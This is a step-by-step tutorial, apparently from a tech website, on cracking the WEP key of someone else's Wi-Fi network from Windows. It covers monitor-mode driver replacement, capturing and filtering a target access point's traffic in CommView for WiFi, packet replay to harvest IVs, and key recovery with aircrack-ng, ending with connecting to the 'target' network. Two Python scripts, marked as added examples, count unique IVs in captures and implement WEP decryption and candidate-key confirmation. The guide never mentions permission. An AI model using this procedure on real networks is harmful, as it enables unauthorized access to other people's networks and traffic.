Step by step: how to crack a Wi-Fi WEP network key

Source: Internet
Author: User

Readers who know wireless networks know that security is their inherent weakness. Because the signal travels through the air it is prone to leakage, and compared with a wired network, monitoring that signal is very easy. Some users rely on WEP encryption to keep their traffic from being read by eavesdroppers. However, WEP no longer offers real protection in today's fast-moving security landscape, and many ways of breaking into WEP networks are documented on the Internet. Today I will introduce a more streamlined method that lets us break into a WEP network and recover the WEP key in plaintext within five minutes.

1. Features of the five-minute WEP attack:

As everyone knows, the attacker first has to capture a sufficient number of WEP-encrypted packets by sniffing or similar means, and then hand them to analysis software that recovers the plaintext WEP key. (This is commonly called brute-force cracking, but aircrack-ng actually recovers the key by statistical analysis of the captured initialization vectors, which is why the number of unique IVs matters more than the raw packet count.) The five-minute method needs the same two ingredients. The difference is that the traditional WEP cracking method requires a dedicated live CD such as BackTrack 3 or 4 (bt3, bt4): you boot a Linux GUI from the scan-and-crack CD and then use its built-in tools to scan and recover the key. On one hand this is restrictive, because you cannot freely choose applications in that GUI; on the other hand you have to download a CD image of several GB and burn it to a disc to boot from. The most critical point is that such cracking cannot be resumed: if the power is cut or the cracking is stopped halfway, all previous work is lost.

The five-minute WEP attack introduced here addresses these shortcomings. First, we do not need to download a large disc image; second, all of the work is done directly in Windows with graphical tools. In addition, we can split the work into two stages, packet collection and key cracking, which greatly improves efficiency and makes the work resumable. With the method described in this article we collect the WEP-encrypted packets in a short time and then run the cracking and recovery of the WEP key separately. Overall, it makes cracking a WEP-protected wireless network faster still.

2. Replace the wireless NIC driver for packet capture:

As with any WEP attack, we first need to update the wireless NIC driver: by default a wireless NIC can communicate, but it cannot capture other stations' traffic (monitor mode). The procedure is as follows.

Step 1: The notebook I use is an IBM T400. Its wireless adapter is an Atheros AR5006-series card by default, and we need to switch it to a driver suitable for monitoring. First open Device Manager, find the wireless adapter under Network adapters, right-click it and select "Update Driver". (Figure 1)


Step 2: In the Hardware Update Wizard, select "Install from a list or specific location (Advanced)" and click "Next" to continue. (Figure 2)


Step 3: Choose the driver. Use the files in the "driver" directory of the attachment. Click "Browse" to locate the corresponding NIC driver, then click "Next". (Figure 3)



Step 4: The system scans the specified directory and updates the NIC driver from the driver files found there. (Figure 4)


Step 5: After the update completes, the wireless adapter is renamed "CommView Atheros AR5006X Wireless Network Adapter". Click "Finish" to complete. (Figure 5)


Step 6: Open Device Manager again and you will see that the name has been updated to CommView Atheros AR5006X Wireless Network Adapter. (Figure 6)

That completes the driver update. The notebook's wireless card can now capture wireless packets, and we can monitor them with dedicated capture software.

3. Install CommView for WiFi and collect wireless packets:

To capture wireless packets, instead of a dedicated live CD such as BackTrack 3 or 4 we can use software under Windows. This is one of the main tools of this article for quickly cracking WEP: the well-known CommView for WiFi.

CommView for WiFi:

Software version: 6.1 build 607

Software size: 9881 KB

License: shareware

Language: English

Supported platforms: Windows 9x/ME/NT/2000/XP/2003



Step 1: Download CommView for WiFi 6.1 build 607 from the Internet. Note that you must choose the "for WiFi" edition; otherwise you will not be able to capture wireless packets. Unpack the download and run the installer, clicking Next until installation completes. (Figure 7)


Step 2: Start CommView for WiFi, click the arrow button (Start Capture) on the main window, and the Scanner window opens. Click the Start Scanning button on the right to scan the wireless networks in range. The scan runs from channel 1 to channel 13, and the SSIDs, device types and other details of the networks found are displayed directly in the Scanner window. Click a network's name to see its details, including signal strength, device MAC address and IP address. (Figure 8)



In practice not every channel carries many networks, so under the Options tab we can restrict the scan to specific channels, for example channels 3, 6 and 7. This speeds up scanning considerably. Click OK after making the settings. (Figure 9)


Step 3: There is an even better way to decide which channels have the most networks: a dedicated fast wireless scanner. I use WirelessMon Professional Edition. With it we learn within seconds which wireless networks exist in the environment, including those that do not broadcast their SSID, together with the channel each one uses, so we can tell which channels are busiest and then go back to the Scanner in CommView for WiFi and set it accordingly. (Figure 10)


Step 4: Generally, you should not capture several different wireless networks at the same time. Otherwise there are more packets to sift through, which makes filtering harder and also greatly reduces the final cracking speed. So, on the Rules tab of CommView for WiFi, add the MAC address of the target access point to the filter and set the direction to monitor: outbound, inbound or both. We generally recommend "Both", since the replies the access point and its clients send are exactly the packets that carry fresh IVs. After adding the MAC address, select "Enable MAC address rules". From then on only traffic of the network with that MAC address is captured and recorded. (Figure 11)


Step 5: Once the filter is set, click Capture on the Scanner page to start capturing. We then see all the wireless packets captured by CommView for WiFi, including the channel and the corresponding SSID. (Figure 12)


Step 6: After capturing for a while, click the Packets tab, where all captured wireless packets are listed. To view and filter them more conveniently, click the rightmost button in the row below the list, the one next to the packet header (packet 18742 in the figure). (Figure 13)


Step 7: In the Log Viewer window we can sort the packets by protocol. The ones marked in blue with the protocol name ENCR.DATA (encrypted data) are the packets we want to analyze: only these encrypted data frames are useful for cracking and recovering the WEP key, because each one carries an IV and a predictable plaintext header. (Figure 14)


Step 8: Right-click such a packet and select Send Packet(s) -> Selected to copy it to the packet generator. (Figure 15)


Step 9: The Send Packets window opens automatically. Here we only need to change the number of times to send. Generally hundreds of thousands of packets are needed for convenient cracking; I usually choose 800,000 packets before cracking. Click "Send" to start replaying the copied packet; the number of packets sent is shown below. Note that every replayed copy carries the same IV as the original, so the replay itself adds no new IVs; what adds IVs is the traffic the access point and clients generate in response (for example when the replayed frame is an ARP request), which is why both directions must be captured. (Figure 16)


Step 10: Once enough packets have been collected, return to the Logging tab on the CommView for WiFi main window and click Save As to save the capture as an NCF file on the local hard disk. (Figure 17)


Step 11: Double-click the saved NCF file and it opens in the Log Viewer, where we can see all captured packets. Choose File -> Export Logs -> Tcpdump Format to convert it to tcpdump (pcap) format, the only format the cracking tool used below accepts. (Figure 18)

With the tcpdump file generated, packet collection is done. Next we use aircrack to recover the WEP key.
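Before handing the export to aircrack-ng it is worth checking what the capture actually contains: how many WEP data frames per BSSID, and how many of those carry distinct IVs. The following Python script is an added example (it is not part of the article and not a CommView or aircrack-ng component). It reads a tcpdump/pcap file of raw 802.11 frames (link type 105, or 127 with a radiotap header), picks out data frames whose Protected bit is set and whose Ext IV bit is clear (WEP rather than TKIP/CCMP), and counts unique IVs per BSSID. The MAC addresses, IVs and frames it builds for itself are constructed sample data, not from any real capture; run it with a file name to analyze a real export.

```python
"""Count unique WEP IVs per BSSID in a tcpdump/pcap capture (added example)."""
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_IEEE802_11 = 105           # raw 802.11 frames
LINKTYPE_IEEE802_11_RADIOTAP = 127  # 802.11 frames preceded by a radiotap header

# Constructed sample addresses (not from any real capture).
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("66778899aabb")
AP2 = bytes.fromhex("0c0d0e0f1011")
BROADCAST = b"\xff" * 6


def parse_wep_frame(frame):
    """Return (bssid, iv) for a WEP-protected 802.11 data frame, else None."""
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2:          # frame type 2 = data
        return None
    if not fc1 & 0x40:                 # Protected Frame bit clear: not encrypted
        return None
    to_ds, from_ds = fc1 & 0x1, fc1 & 0x2
    if to_ds and from_ds:              # WDS frame with four addresses: skip
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = addr1 if to_ds else addr2 if from_ds else addr3
    hdr_len = 24 + (2 if fc0 & 0x80 else 0)   # QoS data subtypes add a 2-byte QoS field
    if len(frame) < hdr_len + 4:
        return None
    iv_field = frame[hdr_len:hdr_len + 4]      # IV(3) + key-id byte
    if iv_field[3] & 0x20:             # Ext IV bit set: TKIP/CCMP, not WEP
        return None
    return ":".join(f"{b:02x}" for b in bssid), iv_field[:3]


def iter_pcap_frames(data):
    """Yield bare 802.11 frames from a pcap byte string (link type 105 or 127)."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC:
        e = "<"
    elif magic == 0xD4C3B2A1:
        e = ">"
    else:
        raise ValueError("not a pcap/tcpdump file")
    linktype, = struct.unpack_from(e + "I", data, 20)
    if linktype not in (LINKTYPE_IEEE802_11, LINKTYPE_IEEE802_11_RADIOTAP):
        raise ValueError(f"unsupported link type {linktype}: export raw 802.11 frames")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(e + "IIII", data, off)
        off += 16
        frame = data[off:off + incl_len]
        off += incl_len
        if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
            rt_len, = struct.unpack_from("<H", frame, 2)   # radiotap length is little-endian
            frame = frame[rt_len:]
        yield frame


def wep_iv_stats(pcap_bytes):
    """Return {bssid: {"wep_frames": n, "unique_ivs": m}} for every BSSID seen."""
    frames, ivs = defaultdict(int), defaultdict(set)
    for frame in iter_pcap_frames(pcap_bytes):
        parsed = parse_wep_frame(frame)
        if parsed is None:
            continue
        bssid, iv = parsed
        frames[bssid] += 1
        ivs[bssid].add(iv)
    return {b: {"wep_frames": frames[b], "unique_ivs": len(ivs[b])} for b in frames}


def _data_frame(fc1, a1, a2, a3, iv, key_id, payload):
    hdr = struct.pack("<BBH", 0x08, fc1, 0) + a1 + a2 + a3 + struct.pack("<H", 0)
    return hdr + iv + bytes([key_id]) + payload


def build_sample_pcap(linktype=LINKTYPE_IEEE802_11):
    """Constructed capture: a beacon, WEP frames both ways, two replays, one CCMP frame."""
    beacon = struct.pack("<BBH", 0x80, 0, 0) + BROADCAST + AP + AP + b"\x00" * 14
    frames = [beacon]
    for iv in (b"\x01\x02\x03", b"\x01\x02\x04", b"\x01\x02\x05"):   # AP -> STA (FromDS)
        frames.append(_data_frame(0x42, STA, AP, STA, iv, 0x00, b"\xaa" * 20))
    client = _data_frame(0x41, AP, STA, AP, b"\x0a\x0b\x0c", 0x00, b"\xbb" * 20)  # STA -> AP
    frames += [client, client, client]        # original plus two replays: one IV, three frames
    frames.append(_data_frame(0x42, STA, AP, STA, b"\x00\x00\x01", 0x20, b"\xcc" * 24))  # CCMP
    frames.append(_data_frame(0x42, STA, AP2, STA, b"\x07\x08\x09", 0x00, b"\xdd" * 20))  # other AP
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype)
    for f in frames:
        if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
            f = struct.pack("<BBHI", 0, 0, 8, 0) + f   # minimal 8-byte radiotap header
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for bssid, s in wep_iv_stats(data).items():
        print(f"{bssid}: {s['wep_frames']} WEP data frames, {s['unique_ivs']} unique IVs")
```

On the constructed sample the target BSSID shows six WEP frames but only four unique IVs: the three replayed copies of the client frame are byte-identical and count once. That gap between "packets sent" in Step 9 and the IVs count aircrack-ng reports is normal; if unique IVs stop growing while the frame count climbs, the access point is not answering the replayed frame and a different packet should be chosen.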

4. Use aircrack-ng to crack the WEP key:

We use aircrack-ng to crack and recover the WEP key; the author uses the Aircrack-ng GUI for Windows. The software is provided in the attachment, and interested readers can also download it themselves.

Step 1: Start the Aircrack-ng GUI main program and select the first tab on the left.

Step 2: Click the Choose button and select the previously exported tcpdump file with the .cap suffix. (Figure 19)

Step 3: Click the Launch button in the lower-right corner to analyze the captured packets. The software lists every wireless network found in the capture; select the one with the highest IVs count, which is the network we want to crack. In this example it shows WEP (38119 IVs). (Figure 20)


Step 4: Enter the index number of the network that has enough IVs and the tool automatically enters the cracking stage; then we wait patiently. If there are not enough IVs, a failure message appears, which means we need to capture more packets. (Figure 21)


Step 5: If enough IVs have been captured, the KEY FOUND! message appears after a while, giving the WEP key used by the target network and achieving the goal of the WEP attack. (Figure 22)


Step 6: With the SSID from the scan and the recovered WEP key we can connect to the target wireless network.
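To make concrete what KEY FOUND! means, and why encrypted data frames with many distinct IVs are what the cracker needs, here is an added Python example of the WEP per-frame cryptography. It is not part of the article and not aircrack-ng's code: it implements RC4 and the WEP frame format (RC4 seeded with IV || key, CRC-32 ICV appended to the plaintext), the check a cracker runs to confirm a candidate key against captured frames (decrypt, verify the ICV), the known-plaintext trick that exposes the first keystream bytes of every data frame (the LLC/SNAP header AA AA 03 00 00 00 is predictable), and the keystream reuse that follows from a 24-bit IV. It does not implement the FMS/KoreK/PTW statistics that rank candidate keys. The key, IV and frame contents are constructed sample values.

```python
"""WEP per-frame crypto: encrypt, confirm a candidate key, recover keystream (added example)."""
import zlib

# Constructed sample key, IV and frame body (not from any real capture).
SAMPLE_KEY = bytes.fromhex("0102030405")       # 40-bit WEP key
SAMPLE_IV = bytes.fromhex("102030")            # 24-bit IV, sent in the clear
LLC_SNAP = b"\xaa\xaa\x03\x00\x00\x00"         # first 6 plaintext bytes of every IP/ARP data frame
SAMPLE_PLAINTEXT = LLC_SNAP + b"\x08\x06" + bytes.fromhex("0001080006040001")  # start of an ARP request


def rc4(key, length):
    """Return `length` bytes of RC4 keystream (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext):
    """WEP frame body: RC4(IV || key) applied to plaintext || CRC-32 ICV (little-endian)."""
    if len(key) not in (5, 13) or len(iv) != 3:
        raise ValueError("WEP uses a 40- or 104-bit key and a 24-bit IV")
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    return _xor(body, rc4(iv + key, len(body)))


def wep_check_key(key, iv, ciphertext):
    """Decrypt with a candidate key; return the plaintext if the ICV verifies, else None."""
    body = _xor(ciphertext, rc4(iv + key, len(ciphertext)))
    plaintext, icv = body[:-4], body[-4:]
    return plaintext if zlib.crc32(plaintext).to_bytes(4, "little") == icv else None


def confirm_key(candidates, frames):
    """Return the first candidate that decrypts every (iv, ciphertext) pair with a valid ICV."""
    for key in candidates:
        if all(wep_check_key(key, iv, ct) is not None for iv, ct in frames):
            return key
    return None


def known_plaintext_keystream(ciphertext, known=LLC_SNAP):
    """First keystream bytes of a data frame: ciphertext XOR the predictable LLC/SNAP header."""
    return _xor(ciphertext[:len(known)], known)


def same_iv_leak(key, iv, p1, p2):
    """Two frames under one IV share keystream, so c1 XOR c2 equals p1 XOR p2 (ICVs included)."""
    return _xor(wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2))


if __name__ == "__main__":
    ct = wep_encrypt(SAMPLE_KEY, SAMPLE_IV, SAMPLE_PLAINTEXT)
    print("ciphertext:", ct.hex())
    print("keystream prefix:", known_plaintext_keystream(ct).hex())
    found = confirm_key([bytes(5), bytes.fromhex("0504030201"), SAMPLE_KEY], [(SAMPLE_IV, ct)])
    print("KEY FOUND!" if found else "failed", found.hex() if found else "")
```

Each captured ENCR.DATA frame hands the attacker its IV in the clear plus the first keystream bytes via the LLC/SNAP header; the statistical attacks correlate those pairs across tens of thousands of distinct IVs to recover key bytes, and the ICV check above is what turns a ranked candidate into a confirmed key. Replayed copies of one frame repeat the same (IV, keystream) pair and contribute nothing to that correlation, which is why the unique-IV count, not the packet count, decides success.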

5. Summary:

This article described how to crack and recover a wireless network's WEP key directly under Windows, without a boot disc. The method has three main features. First, the whole attack is completed in Windows: we can capture packets while using the Internet normally and no longer need to burn a boot disc. Second, the attack works from saved packet captures, so collection and cracking can be separated, which makes the operation more flexible and lets the cracking be done in batches. Third, compared with traditional passive capture of WEP traffic, this method actively provokes replies by copying a WEP-encrypted packet and replaying it repeatedly, so enough WEP packets with fresh IVs are collected in the shortest time, greatly improving the cracking speed. For ordinary users, WEP encryption is no longer secure; only other encryption such as WPA and WPA2 (preferably WPA2 with AES/CCMP) can protect the privacy of wireless communication. We therefore hope wireless users will take this article seriously and reduce the number of WEP-protected networks. After all, to an intruder, WEP encryption is just a half-open door.
